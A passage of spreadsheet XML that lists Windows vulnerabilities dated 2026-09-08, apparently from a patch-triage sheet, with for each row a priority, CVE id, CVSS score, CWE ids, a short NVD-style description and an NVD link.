          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69535</t>
        </is>
      </c>
      <c r="C2176" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2176" s="5" t="inlineStr"/>
      <c r="F2176" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2176" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2176" s="5" t="inlineStr"/>
      <c r="I2176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2176" s="5" t="inlineStr"/>
      <c r="K2176" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L2176" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t>
        </is>
      </c>
    </row>
    <row r="2177">
      <c r="A2177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69538</t>
        </is>
      </c>
      <c r="C2177" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2177" s="5" t="inlineStr"/>
      <c r="F2177" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2177" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2177" s="5" t="inlineStr"/>
      <c r="I2177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2177" s="5" t="inlineStr"/>
      <c r="K2177" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2177" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t>
        </is>
      </c>
    </row>
    <row r="2178">
      <c r="A2178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69541</t>
        </is>
      </c>
      <c r="C2178" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2178" s="5" t="inlineStr"/>
      <c r="F2178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2178" s="5" t="inlineStr"/>
      <c r="H2178" s="5" t="inlineStr"/>
      <c r="I2178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2178" s="5" t="inlineStr"/>
      <c r="K2178" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2178" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69541</t>
        </is>
      </c>
    </row>
    <row r="2179">
      <c r="A2179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69542</t>
        </is>
      </c>
      <c r="C2179" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2179" s="5" t="inlineStr"/>
      <c r="F2179" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2179" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2179" s="5" t="inlineStr"/>
      <c r="I2179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2179" s="5" t="inlineStr"/>
      <c r="K2179" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2179" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t>
        </is>
      </c>
    </row>
    <row r="2180">
      <c r="A2180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69544</t>
        </is>
      </c>
      <c r="C2180" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2180" s="5" t="inlineStr"/>
      <c r="F2180" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2180" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2180" s="5" t="inlineStr"/>
      <c r="I2180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2180" s="5" t="inlineStr"/>
      <c r="K2180" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2180" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t>
        </is>
      </c>
    </row>
    <row r="2181">
      <c r="A2181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69561</t>
        </is>
      </c>
      <c r="C2181" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2181" s="5" t="inlineStr"/>
      <c r="F2181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2181" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2181" s="5" t="inlineStr"/>
      <c r="I2181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2181" s="5" t="inlineStr"/>
      <c r="K2181" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2181" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t>
        </is>
      </c>
    </row>
    <row r="2182">
      <c r="A2182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="C2182" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2182" s="5" t="inlineStr"/>
      <c r="F2182" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2182" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2182" s="5" t="inlineStr"/>
      <c r="I2182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2182" s="5" t="inlineStr"/>
      <c r="K2182" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2182" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="2183">
      <c r="A2183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69576</t>
        </is>
      </c>
      <c r="C2183" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2183" s="5" t="inlineStr"/>
      <c r="F2183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2183" s="5" t="inlineStr"/>
      <c r="H2183" s="5" t="inlineStr"/>
      <c r="I2183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2183" s="5" t="inlineStr"/>
      <c r="K2183" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2183" s="5" t="inlineStr">
        <is>
          <t>Use after free in Graphic Fonts allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69576</t>
        </is>
      </c>
    </row>
    <row r="2184">
      <c r="A2184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69580</t>
        </is>
      </c>
      <c r="C2184" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2184" s="5" t="inlineStr"/>
      <c r="F2184" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2184" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H218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184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2184" s="5" t="inlineStr"/>
      <c r="K2184" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2184" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t>
        </is>
      </c>
    </row>
    <row r="2185">
      <c r="A2185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69582</t>
        </is>
      </c>
      <c r="C2185" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2185" s="5" t="inlineStr"/>
      <c r="F2185" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2185" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2185" s="5" t="inlineStr"/>
      <c r="I2185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2185" s="5" t="inlineStr"/>
      <c r="K2185" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L2185" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t>
        </is>
      </c>
    </row>
    <row r="2186">
      <c r="A2186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="C2186" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2186" s="5" t="inlineStr"/>
      <c r="F2186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2186" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2186" s="5" t="inlineStr"/>
      <c r="I2186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2186" s="5" t="inlineStr"/>
      <c r="K2186" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2186" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="2187">
      <c r="A2187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="C2187" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2187" s="5" t="inlineStr"/>
      <c r="F2187" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2187" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2187" s="5" t="inlineStr"/>
      <c r="I2187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2187" s="5" t="inlineStr"/>
      <c r="K2187" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2187" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="2188">
      <c r="A2188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69585</t>
        </is>
      </c>
      <c r="C2188" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2188" s="5" t="inlineStr"/>
      <c r="F2188" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2188" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2188" s="5" t="inlineStr"/>
      <c r="I2188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2188" s="5" t="inlineStr"/>
      <c r="K2188" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="L2188" s="5" t="inlineStr">
        <is>
          <t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t>
        </is>
      </c>
    </row>
    <row r="2189">
      <c r="A2189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="C2189" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2189" s="5" t="inlineStr"/>
      <c r="F2189" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2189" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2189" s="5" t="inlineStr"/>
      <c r="I2189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2189" s="5" t="inlineStr"/>
      <c r="K2189" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2189" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="2190">
      <c r="A2190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69592</t>
        </is>
      </c>
      <c r="C2190" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2190" s="5" t="inlineStr"/>
      <c r="F2190" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2190" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2190" s="5" t="inlineStr"/>
      <c r="I2190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2190" s="5" t="inlineStr"/>
      <c r="K2190" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2190" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t>
        </is>
      </c>
    </row>
    <row r="2191">
      <c r="A2191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="C2191" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2191" s="5" t="inlineStr"/>
      <c r="F2191" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2191" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2191" s="5" t="inlineStr"/>
      <c r="I2191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2191" s="5" t="inlineStr"/>
      <c r="K2191" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2191" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="2192">
      <c r="A2192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69594</t>
        </is>
      </c>
      <c r="C2192" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2192" s="5" t="inlineStr"/>
      <c r="F2192" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2192" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2192" s="5" t="inlineStr"/>
      <c r="I2192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2192" s="5" t="inlineStr"/>
      <c r="K2192" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2192" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t>
        </is>
      </c>
    </row>
    <row r="2193">
      <c r="A2193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69604</t>
        </is>
      </c>
      <c r="C2193" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2193" s="5" t="inlineStr"/>
      <c r="F2193" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2193" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2193" s="5" t="inlineStr"/>
      <c r="I2193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2193" s="5" t="inlineStr"/>
      <c r="K2193" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2193" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t>
        </is>
      </c>
    </row>
    <row r="2194">
      <c r="A2194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69608</t>
        </is>
      </c>
      <c r="C2194" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2194" s="5" t="inlineStr"/>
      <c r="F2194" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2194" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2194" s="5" t="inlineStr"/>
      <c r="I2194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2194" s="5" t="inlineStr"/>
      <c r="K2194" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2194" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t>
        </is>
      </c>
    </row>
    <row r="2195">
      <c r="A2195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69612</t>
        </is>
      </c>
      <c r="C2195" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2195" s="5" t="inlineStr"/>
      <c r="F2195" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2195" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2195" s="5" t="inlineStr"/>
      <c r="I2195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2195" s="5" t="inlineStr"/>
      <c r="K2195" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L2195" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t>
        </is>
      </c>
    </row>
    <row r="2196">
      <c r="A2196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69685</t>
        </is>
      </c>
      <c r="C2196" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2196" s="5" t="inlineStr"/>
      <c r="F2196" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2196" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2196" s="5" t="inlineStr"/>
      <c r="I2196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2196" s="5" t="inlineStr"/>
      <c r="K2196" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2196" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t>
        </is>
      </c>
    </row>
    <row r="2197">
      <c r="A2197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="C2197" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2197" s="5" t="inlineStr"/>
      <c r="F2197" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2197" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2197" s="5" t="inlineStr"/>
      <c r="I2197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2197" s="5" t="inlineStr"/>
      <c r="K2197" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2197" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="2198">
      <c r="A2198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69691</t>
        </is>
      </c>
      <c r="C2198" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2198" s="5" t="inlineStr"/>
      <c r="F2198" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2198" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2198" s="5" t="inlineStr"/>
      <c r="I2198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2198" s="5" t="inlineStr"/>
      <c r="K2198" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2198" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t>
        </is>
      </c>
    </row>
    <row r="2199">
      <c r="A2199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="C2199" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2199" s="5" t="inlineStr"/>
      <c r="F2199" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2199" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2199" s="5" t="inlineStr"/>
      <c r="I2199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2199" s="5" t="inlineStr"/>
      <c r="K2199" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2199" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="2200">
      <c r="A2200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69709</t>
        </is>
      </c>
      <c r="C2200" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2200" s="5" t="inlineStr"/>
